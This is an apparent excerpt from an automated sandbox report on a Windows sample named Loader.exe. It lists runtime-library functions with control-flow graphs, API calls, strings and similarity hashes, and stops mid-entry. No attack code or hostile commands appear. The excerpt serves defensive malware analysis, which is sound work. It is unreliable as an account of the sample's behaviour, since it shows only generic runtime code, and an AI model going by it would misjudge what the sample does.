                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: af9f9a965c9620c2d5a8a168e7c6f4cf8a5f301163c51e171c9bc07238edb37d
                                                                                                                                                                                                                                                                  • Instruction ID: 7435f1cc7c99192808a8bc5f5d9c0b02246f1038bc7c1d6a4deaa1451f2f2730
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: af9f9a965c9620c2d5a8a168e7c6f4cf8a5f301163c51e171c9bc07238edb37d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0051B371E566288FCF04CEACD494BDE7BF1BB4A318F21611AD819AB790C335A805CF91
                                                                                                                                                                                                                                                                  Function 6CE52FA1 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 1244d2490e722d8e2d4b08a687ba54e345a4788b81df14d6debf1e67a5b6da9d
                                                                                                                                                                                                                                                                  • Instruction ID: db46282483943067404ddaad5fd73f6d2b669c9930719bc2d3b94bafe506f4de
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1244d2490e722d8e2d4b08a687ba54e345a4788b81df14d6debf1e67a5b6da9d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5E08C32916238EBCB14CB88D949A8AF3FCEB44B04B61409AB611E3640C272DE10CBE0
                                                                                                                                                                                                                                                                  Function 6CE55680 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 1659 6ce55680-6ce55694 1660 6ce55696-6ce5569b 1659->1660 1661 6ce55702-6ce5570a 1659->1661 1660->1661 1662 6ce5569d-6ce556a2 1660->1662 1663 6ce55751-6ce55769 call 6ce557f1 1661->1663 1664 6ce5570c-6ce5570f 1661->1664 1662->1661 1665 6ce556a4-6ce556a7 1662->1665 1673 6ce5576c-6ce55773 1663->1673 1664->1663 1667 6ce55711-6ce5574e call 6ce52f67 * 4 1664->1667 1665->1661 1668 6ce556a9-6ce556b1 1665->1668 1667->1663 1671 6ce556b3-6ce556b6 1668->1671 1672 6ce556cb-6ce556d3 1668->1672 1671->1672 1675 6ce556b8-6ce556ca call 6ce52f67 call 6ce575b7 1671->1675 1678 6ce556d5-6ce556d8 1672->1678 1679 6ce556ed-6ce55701 call 6ce52f67 * 2 1672->1679 1676 6ce55775-6ce55779 1673->1676 1677 6ce55792-6ce55796 1673->1677 1675->1672 1683 6ce5578f 1676->1683 1684 6ce5577b-6ce5577e 1676->1684 1687 6ce557ae-6ce557ba 1677->1687 1688 6ce55798-6ce5579d 1677->1688 1678->1679 1685 6ce556da-6ce556ec call 6ce52f67 call 6ce576b5 1678->1685 1679->1661 1683->1677 1684->1683 1692 6ce55780-6ce5578e call 6ce52f67 * 2 1684->1692 1685->1679 1687->1673 1690 6ce557bc-6ce557c7 call 6ce52f67 1687->1690 1695 6ce5579f-6ce557a2 1688->1695 1696 6ce557ab 1688->1696 1692->1683 1695->1696 1697 6ce557a4-6ce557aa call 6ce52f67 1695->1697 1696->1687 1697->1696
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 6CE556C4
                                                                                                                                                                                                                                                                    • Part of subcall function 6CE575B7: _free.LIBCMT ref: 6CE575D4
                                                                                                                                                                                                                                                                    • Part of subcall function 6CE575B7: _free.LIBCMT ref: 6CE575E6
                                                                                                                                                                                                                                                                    • Part of subcall function 6CE575B7: _free.LIBCMT ref: 6CE575F8
                                                                                                                                                                                                                                                                    • Part of subcall function 6CE575B7: _free.LIBCMT ref: 6CE5760A
                                                                                                                                                                                                                                                                    • Part of subcall function 6CE575B7: _free.LIBCMT ref: 6CE5761C
                                                                                                                                                                                                                                                                    • Part of subcall function 6CE575B7: _free.LIBCMT ref: 6CE5762E
                                                                                                                                                                                                                                                                    • Part of subcall function 6CE575B7: _free.LIBCMT ref: 6CE57640
                                                                                                                                                                                                                                                                    • Part of subcall function 6CE575B7: _free.LIBCMT ref: 6CE57652
                                                                                                                                                                                                                                                                    • Part of subcall function 6CE575B7: _free.LIBCMT ref: 6CE57664
                                                                                                                                                                                                                                                                    • Part of subcall function 6CE575B7: _free.LIBCMT ref: 6CE57676
                                                                                                                                                                                                                                                                    • Part of subcall function 6CE575B7: _free.LIBCMT ref: 6CE57688
                                                                                                                                                                                                                                                                    • Part of subcall function 6CE575B7: _free.LIBCMT ref: 6CE5769A
                                                                                                                                                                                                                                                                    • Part of subcall function 6CE575B7: _free.LIBCMT ref: 6CE576AC
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 6CE556B9
                                                                                                                                                                                                                                                                    • Part of subcall function 6CE52F67: HeapFree.KERNEL32(00000000,00000000,?,6CE52479), ref: 6CE52F7D
                                                                                                                                                                                                                                                                    • Part of subcall function 6CE52F67: GetLastError.KERNEL32(?,?,6CE52479), ref: 6CE52F8F
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 6CE556DB
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 6CE556F0
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 6CE556FB
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 6CE5571D
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 6CE55730
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 6CE5573E
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 6CE55749
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 6CE55781
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 6CE55788
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 6CE557A5
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 6CE557BD
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                                                                                                                                  • Opcode ID: f5eb8a1e91efe57e3a14063ba8a1aa2514c353046591a1eef8994435a07eb87b
                                                                                                                                                                                                                                                                  • Instruction ID: 4a94c8cbfedd25cd36105518cf7aa5fcbc19d05c97b852a78fdd7d243c696078
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f5eb8a1e91efe57e3a14063ba8a1aa2514c353046591a1eef8994435a07eb87b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B311C31606300DFEB119B75E845B9677F8EF0031CFB04429E4A9D6BA0DB73F9648A20
                                                                                                                                                                                                                                                                  Function 6CE52AE3 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 1716 6ce52ae3-6ce52af6 1717 6ce52b02-6ce52baf call 6ce52f67 * 9 call 6ce5290f call 6ce5297a 1716->1717 1718 6ce52af8-6ce52b01 call 6ce52f67 1716->1718 1718->1717
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                                  • Opcode ID: 6be838dc40d6542c5857ea3731eb9a5b16e1f78a7389944370bcc4fd028bc68b
                                                                                                                                                                                                                                                                  • Instruction ID: 3dd14d50af2015d737f0f0c39381e9e3bfc0d9a9d7b05346a2f3aa9095a12845
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6be838dc40d6542c5857ea3731eb9a5b16e1f78a7389944370bcc4fd028bc68b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F921AB76900108AFCB41DF94D845DDD7BB9FF18748F5041A9F515EBA20DB32EA68CB90
                                                                                                                                                                                                                                                                  Function 6CE545A8 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 1909 6ce545a8-6ce545b4 1910 6ce5465b-6ce5465e 1909->1910 1911 6ce54664 1910->1911 1912 6ce545b9-6ce545ca 1910->1912 1915 6ce54666-6ce5466a 1911->1915 1913 6ce545d7-6ce545f0 LoadLibraryExW 1912->1913 1914 6ce545cc-6ce545cf 1912->1914 1918 6ce54642-6ce5464b 1913->1918 1919 6ce545f2-6ce545fb GetLastError 1913->1919 1916 6ce545d5 1914->1916 1917 6ce54658 1914->1917 1920 6ce54654-6ce54656 1916->1920 1917->1910 1918->1920 1921 6ce5464d-6ce5464e FreeLibrary 1918->1921 1922 6ce54632 1919->1922 1923 6ce545fd-6ce5460f call 6ce52883 1919->1923 1920->1917 1925 6ce5466b-6ce5466d 1920->1925 1921->1920 1924 6ce54634-6ce54636 1922->1924 1923->1922 1929 6ce54611-6ce54623 call 6ce52883 1923->1929 1924->1918 1927 6ce54638-6ce54640 1924->1927 1925->1915 1927->1917 1929->1922 1932 6ce54625-6ce54630 LoadLibraryExW 1929->1932 1932->1924
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-$y$l
                                                                                                                                                                                                                                                                  • API String ID: 0-1475279248
                                                                                                                                                                                                                                                                  • Opcode ID: 97134f5e0490a4ccb46e213e6258f68f1d5d0813d3d91574f44e659df6b08ab8
                                                                                                                                                                                                                                                                  • Instruction ID: 6081a7de29921c8d9f745dc9a3ca178a97e742334213929f3604bf76fa4f44c1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97134f5e0490a4ccb46e213e6258f68f1d5d0813d3d91574f44e659df6b08ab8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A921E731A46225ABDB158A658C84B9E37789F0376CFF10612E925A7BC0D7B2DD34C6E0
                                                                                                                                                                                                                                                                  Function 6CE50D80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 1933 6ce50d80-6ce50dd1 call 6ce59ad0 call 6ce50d40 call 6ce511c7 1940 6ce50dd3-6ce50de5 1933->1940 1941 6ce50e2d-6ce50e30 1933->1941 1942 6ce50e50-6ce50e59 1940->1942 1944 6ce50de7-6ce50dfe 1940->1944 1941->1942 1943 6ce50e32-6ce50e3f call 6ce511b0 1941->1943 1948 6ce50e44-6ce50e4d call 6ce50d40 1943->1948 1946 6ce50e14 1944->1946 1947 6ce50e00-6ce50e0e call 6ce51150 1944->1947 1950 6ce50e17-6ce50e1c 1946->1950 1956 6ce50e24-6ce50e2b 1947->1956 1957 6ce50e10 1947->1957 1948->1942 1950->1944 1951 6ce50e1e-6ce50e20 1950->1951 1951->1942 1954 6ce50e22 1951->1954 1954->1948 1956->1948 1958 6ce50e12 1957->1958 1959 6ce50e5a-6ce50e63 1957->1959 1958->1950 1960 6ce50e65-6ce50e6c 1959->1960 1961 6ce50e9d-6ce50ead call 6ce51190 1959->1961 1960->1961 1963 6ce50e6e-6ce50e7d call 6ce59970 1960->1963 1966 6ce50ec1-6ce50edd call 6ce50d40 call 6ce51170 1961->1966 1967 6ce50eaf-6ce50ebe call 6ce511b0 1961->1967 1971 6ce50e7f-6ce50e97 1963->1971 1972 6ce50e9a 1963->1972 1967->1966 1971->1972 1972->1961
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 6CE50DB7
                                                                                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 6CE50DBF
                                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 6CE50E48
                                                                                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 6CE50E73
                                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 6CE50EC8
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                  • Opcode ID: dc00db249eb1939f21ff292a7a94931ee97caaecf5674218ea37cf1aa10ee146
                                                                                                                                                                                                                                                                  • Instruction ID: 009fc9deddabd3455ea43c3bcb4d410f32c3db22f8ae8c83906385e9dd24a9d7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc00db249eb1939f21ff292a7a94931ee97caaecf5674218ea37cf1aa10ee146
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A841B574A002489BCF00CF69C884ADEBBB5AF0532CF748559F9185B751DB37EA26CB91
                                                                                                                                                                                                                                                                  Function 6CE538ED Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 1979 6ce538ed-6ce538f8 1980 6ce53909-6ce5390f 1979->1980 1981 6ce538fa-6ce53904 call 6ce539db 1979->1981 1983 6ce53936-6ce5394b call 6ce5437b 1980->1983 1984 6ce53911-6ce53917 1980->1984 1992 6ce539b1-6ce539b3 1981->1992 1994 6ce53963-6ce5396a 1983->1994 1995 6ce5394d-6ce53961 GetLastError call 6ce53015 call 6ce5304b 1983->1995 1987 6ce53919-6ce53924 call 6ce539b4 1984->1987 1988 6ce5392a-6ce53934 1984->1988 1987->1988 1990 6ce539b0 1987->1990 1988->1990 1990->1992 1997 6ce5396c-6ce53976 call 6ce539b4 1994->1997 1998 6ce53978-6ce53991 call 6ce5437b 1994->1998 1995->1990 1997->1998 2008 6ce539af 1997->2008 2005 6ce53993-6ce539a7 GetLastError call 6ce53015 call 6ce5304b 1998->2005 2006 6ce539a9-6ce539ad 1998->2006 2005->2008 2006->2008 2008->1990
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: C:\Users\user\Desktop\Loader.exe${:l
                                                                                                                                                                                                                                                                  • API String ID: 0-698482631
                                                                                                                                                                                                                                                                  • Opcode ID: b25c33fba457f5f8dd5253f5a0977c157083dc5a3f1bb9f1fd61debbf3c1ed27
                                                                                                                                                                                                                                                                  • Instruction ID: 43688f1b7a16fa05a716d7e0ba0ad1ba56db5ff837d539b60f718676ef234030
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b25c33fba457f5f8dd5253f5a0977c157083dc5a3f1bb9f1fd61debbf3c1ed27
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF21B0F1208605AFD7109B668C8099B777CAB0236C7B44619F81497B54E723ED758760
                                                                                                                                                                                                                                                                  Function 6CE57756 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 6CE5771E: _free.LIBCMT ref: 6CE57743
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 6CE577A4
                                                                                                                                                                                                                                                                    • Part of subcall function 6CE52F67: HeapFree.KERNEL32(00000000,00000000,?,6CE52479), ref: 6CE52F7D
                                                                                                                                                                                                                                                                    • Part of subcall function 6CE52F67: GetLastError.KERNEL32(?,?,6CE52479), ref: 6CE52F8F
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 6CE577AF
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 6CE577BA
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 6CE5780E
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 6CE57819
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 6CE57824
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 6CE5782F
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                                  • Opcode ID: 7df7bc2e45ad0bb9c7f8bc702183ee147632bc2a3689b57671c2733396f6c7e8
                                                                                                                                                                                                                                                                  • Instruction ID: 9c43a9602d35e65c2ef9371c7b68d6e485ecfc3a3679a27b9328edf953dff022
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7df7bc2e45ad0bb9c7f8bc702183ee147632bc2a3689b57671c2733396f6c7e8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A114571550B04AAD620AB70EC46FD7B7BCDF00706FA04C1DA299A6650DB67B5384750
                                                                                                                                                                                                                                                                  Function 6CE5686F Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6CE568B7
                                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 6CE56A9C
                                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 6CE56AB9
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,6CE55099,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CE56B01
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CE56B41
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CE56BE9
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017079774.000000006CEAF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ce10000_Loader.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1735259414-0
                                                                                                                                                                                                                                                                  • Opcode ID: 1d1aa2926a4616c9b7435d7eb83e396194bf673aadd650b767fca6aba4d30786
                                                                                                                                                                                                                                                                  • Instruction ID: 82c11e7ffe5d781956d12cecb2ec55ce208e2e4bdbd4fdd88ac22aacb56b2b9d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d1aa2926a4616c9b7435d7eb83e396194bf673aadd650b767fca6aba4d30786
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7C18D75D012588FDF10CFE8C8809EDBBB9AF09318F68816AE855FB741D6329956CF60
                                                                                                                                                                                                                                                                  Function 6CE51257 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000001,?,6CE50F25,6CE4EF68,6CE4E92F,?,6CE4EB67,?,00000001,?,?,00000001,?,6CE5F8C8,0000000C,6CE4EC60), ref: 6CE51265
                                                                                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CE51273
                                                                                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CE5128C
                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,6CE4EB67,?,00000001,?,?,00000001,?,6CE5F8C8,0000000C,6CE4EC60,?,00000001,?), ref: 6CE512DE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2016984286.000000006CE11000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CE10000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2016972627.000000006CE10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017021847.000000006CE5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2017039541.000000006CE61000.00000004.00000001.01000000.00000006.sdmpDownload File
